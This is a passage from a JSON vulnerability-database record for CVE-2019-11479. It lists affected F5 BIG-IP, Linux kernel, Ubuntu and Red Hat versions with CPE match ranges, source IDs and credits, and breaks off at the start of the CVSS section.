        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.10"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.52"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.182"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.5.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "big-ip link controller",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.1.1"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arch linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "coreos",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.182",
                "versionStartIncluding": "4.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.182",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.127",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.52",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.1.11",
                "versionStartIncluding": "5.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3.2",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.0.1.1",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5.1",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.1",
                "versionStartIncluding": "14.1.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:enterprise_manager:3.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.1.0",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.4.0",
                "versionStartIncluding": "5.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.1.0",
                "versionStartIncluding": "6.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:iworkflow:2.3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153323"
      },
      {
        "db": "PACKETSTORM",
        "id": "153326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153315"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153320"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-11479",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
